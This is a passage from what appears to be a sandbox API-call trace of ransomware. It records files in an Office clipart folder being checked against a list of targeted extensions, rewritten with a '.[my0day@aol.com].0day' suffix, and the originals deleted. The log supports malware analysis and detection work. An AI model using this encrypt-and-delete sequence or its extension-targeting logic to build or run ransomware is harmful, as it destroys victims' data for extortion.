Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.979] lstrlenW (lpString=".1cd") returned 4 [0271.979] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.979] lstrlenW (lpString=".jpg") returned 4 [0271.979] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.979] lstrlenW (lpString=".doc") returned 4 [0271.979] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.979] lstrlenW (lpString=".docx") returned 5 [0271.979] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.979] lstrlenW (lpString=".pdf") returned 4 [0271.979] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.979] lstrlenW (lpString=".xls") returned 4 [0271.979] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.979] lstrlenW (lpString=".xlsx") returned 5 [0271.979] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.979] lstrlenW (lpString=".ppt") returned 4 [0271.979] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.979] lstrlenW (lpString=".zip") returned 4 [0271.979] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.979] lstrlenW (lpString=".rar") returned 4 [0271.980] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.980] lstrlenW (lpString=".bz2") returned 4 [0271.980] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.980] lstrlenW (lpString=".7z") returned 3 [0271.980] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.980] lstrlenW (lpString=".dbf") returned 4 [0271.980] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.980] lstrlenW (lpString=".1cd") returned 4 [0271.980] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.980] lstrlenW (lpString=".jpg") returned 4 [0271.980] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.980] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.980] lstrlenW (lpString="BS01639_.WMF") returned 12 [0271.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0271.981] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=4236) returned 1 [0271.981] CloseHandle (hObject=0x3a4) returned 1 [0271.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf")) returned 0x20 [0271.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0271.981] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.981] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.981] GetLastError () returned 0x0 [0271.981] ReadFile (in: hFile=0x3a4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x108c, lpOverlapped=0x0) returned 1 [0272.009] WriteFile (in: hFile=0x3a8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x1090, lpOverlapped=0x0) returned 1 [0272.010] ReadFile (in: hFile=0x3a4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0272.010] WriteFile (in: hFile=0x3a8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.010] SetEndOfFile (hFile=0x3a8) returned 1 [0272.067] CloseHandle (hObject=0x3a8) returned 1 [0272.068] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.068] SetEndOfFile (hFile=0x3a4) returned 1 [0272.070] CloseHandle (hObject=0x3a4) returned 1 [0272.070] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.086] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf")) returned 1 [0272.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.105] lstrlenW (lpString=".doc") returned 4 [0272.105] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.105] lstrlenW (lpString=".docx") returned 5 [0272.105] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.105] lstrlenW (lpString=".pdf") returned 4 [0272.105] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.105] lstrlenW (lpString=".xls") returned 4 [0272.105] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.105] lstrlenW (lpString=".xlsx") returned 5 [0272.105] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.105] lstrlenW (lpString=".ppt") returned 4 [0272.105] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.105] lstrlenW (lpString=".zip") returned 4 [0272.105] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.105] lstrlenW (lpString=".rar") returned 4 [0272.105] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.105] lstrlenW (lpString=".bz2") returned 4 [0272.105] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.105] lstrlenW (lpString=".7z") returned 3 [0272.105] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.105] lstrlenW (lpString=".dbf") returned 4 [0272.105] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.105] lstrlenW (lpString=".1cd") returned 4 [0272.105] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.105] lstrlenW (lpString=".jpg") returned 4 [0272.106] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.106] lstrlenW (lpString=".doc") returned 4 [0272.106] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.106] lstrlenW (lpString=".docx") returned 5 [0272.106] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.106] lstrlenW (lpString=".pdf") returned 4 [0272.106] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.106] lstrlenW (lpString=".xls") returned 4 [0272.106] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.106] lstrlenW (lpString=".xlsx") returned 5 [0272.106] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.106] lstrlenW (lpString=".ppt") returned 4 [0272.106] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.106] lstrlenW (lpString=".zip") returned 4 [0272.106] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.106] lstrlenW (lpString=".rar") returned 4 [0272.106] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.106] lstrlenW (lpString=".bz2") returned 4 [0272.106] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.107] lstrlenW (lpString=".7z") returned 3 [0272.107] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.107] lstrlenW (lpString=".dbf") returned 4 [0272.107] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.107] lstrlenW (lpString=".1cd") returned 4 [0272.107] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0272.107] lstrlenW (lpString=".jpg") returned 4 [0272.107] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.107] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.107] lstrlenW (lpString="CRANE.WMF") returned 9 [0272.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.123] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=5270) returned 1 [0272.123] CloseHandle (hObject=0x394) returned 1 [0272.124] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf")) returned 0x20 [0272.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.157] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.157] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.160] GetLastError () returned 0x0 [0272.160] ReadFile (in: hFile=0x380, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x1496, lpOverlapped=0x0) returned 1 [0272.164] WriteFile (in: hFile=0x318, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x14a0, lpOverlapped=0x0) returned 1 [0272.166] ReadFile (in: hFile=0x380, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0272.166] WriteFile (in: hFile=0x318, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0272.166] SetEndOfFile (hFile=0x318) returned 1 [0272.166] CloseHandle (hObject=0x318) returned 1 [0272.166] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.166] SetEndOfFile (hFile=0x380) returned 1 [0272.169] CloseHandle (hObject=0x380) returned 1 [0272.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf")) returned 1 [0272.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.174] lstrlenW (lpString=".doc") returned 4 [0272.174] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.174] lstrlenW (lpString=".docx") returned 5 [0272.174] lstrcmpiW (lpString1=".docx", lpString2="E.WMF") returned -1 [0272.174] lstrlenW (lpString=".pdf") returned 4 [0272.174] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.174] lstrlenW (lpString=".xls") returned 4 [0272.175] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.175] lstrlenW (lpString=".xlsx") returned 5 [0272.175] lstrcmpiW (lpString1=".xlsx", lpString2="E.WMF") returned -1 [0272.175] lstrlenW (lpString=".ppt") returned 4 [0272.175] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.175] lstrlenW (lpString=".zip") returned 4 [0272.175] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.175] lstrlenW (lpString=".rar") returned 4 [0272.175] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.175] lstrlenW (lpString=".bz2") returned 4 [0272.175] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.175] lstrlenW (lpString=".7z") returned 3 [0272.175] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.175] lstrlenW (lpString=".dbf") returned 4 [0272.175] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.175] lstrlenW (lpString=".1cd") returned 4 [0272.175] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.175] lstrlenW (lpString=".jpg") returned 4 [0272.175] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.175] lstrlenW (lpString=".doc") returned 4 [0272.175] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.176] lstrlenW (lpString=".docx") returned 5 [0272.176] lstrcmpiW (lpString1=".docx", lpString2="E.WMF") returned -1 [0272.176] lstrlenW (lpString=".pdf") returned 4 [0272.176] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.176] lstrlenW (lpString=".xls") returned 4 [0272.176] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.176] lstrlenW (lpString=".xlsx") returned 5 [0272.176] lstrcmpiW (lpString1=".xlsx", lpString2="E.WMF") returned -1 [0272.176] lstrlenW (lpString=".ppt") returned 4 [0272.176] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.176] lstrlenW (lpString=".zip") returned 4 [0272.176] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.176] lstrlenW (lpString=".rar") returned 4 [0272.176] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.176] lstrlenW (lpString=".bz2") returned 4 [0272.176] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.176] lstrlenW (lpString=".7z") returned 3 [0272.176] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.176] lstrlenW (lpString=".dbf") returned 4 [0272.176] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.176] lstrlenW (lpString=".1cd") returned 4 [0272.176] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0272.176] lstrlenW (lpString=".jpg") returned 4 [0272.176] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.177] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.177] lstrlenW (lpString="CUP.WMF") returned 7 [0272.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.184] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=2966) returned 1 [0272.184] CloseHandle (hObject=0x318) returned 1 [0272.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf")) returned 0x20 [0272.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.185] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.185] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.185] GetLastError () returned 0x0 [0272.185] ReadFile (in: hFile=0x318, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0xb96, lpOverlapped=0x0) returned 1 [0272.190] WriteFile (in: hFile=0x394, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xba0, lpOverlapped=0x0) returned 1 [0272.191] ReadFile (in: hFile=0x318, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0272.191] WriteFile (in: hFile=0x394, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xe2, lpOverlapped=0x0) returned 1 [0272.191] SetEndOfFile (hFile=0x394) returned 1 [0272.191] CloseHandle (hObject=0x394) returned 1 [0272.191] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.191] SetEndOfFile (hFile=0x318) returned 1 [0272.311] CloseHandle (hObject=0x318) returned 1 [0272.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.464] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf")) returned 1 [0272.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.464] lstrlenW (lpString=".doc") returned 4 [0272.464] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.464] lstrlenW (lpString=".docx") returned 5 [0272.464] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0272.464] lstrlenW (lpString=".pdf") returned 4 [0272.464] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.464] lstrlenW (lpString=".xls") returned 4 [0272.464] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.464] lstrlenW (lpString=".xlsx") returned 5 [0272.464] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0272.464] lstrlenW (lpString=".ppt") returned 4 [0272.464] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.464] lstrlenW (lpString=".zip") returned 4 [0272.464] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.464] lstrlenW (lpString=".rar") returned 4 [0272.464] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.464] lstrlenW (lpString=".bz2") returned 4 [0272.465] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.465] lstrlenW (lpString=".7z") returned 3 [0272.465] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.465] lstrlenW (lpString=".dbf") returned 4 [0272.465] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.465] lstrlenW (lpString=".1cd") returned 4 [0272.465] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.465] lstrlenW (lpString=".jpg") returned 4 [0272.465] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.465] lstrlenW (lpString=".doc") returned 4 [0272.465] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.465] lstrlenW (lpString=".docx") returned 5 [0272.465] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0272.465] lstrlenW (lpString=".pdf") returned 4 [0272.465] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.465] lstrlenW (lpString=".xls") 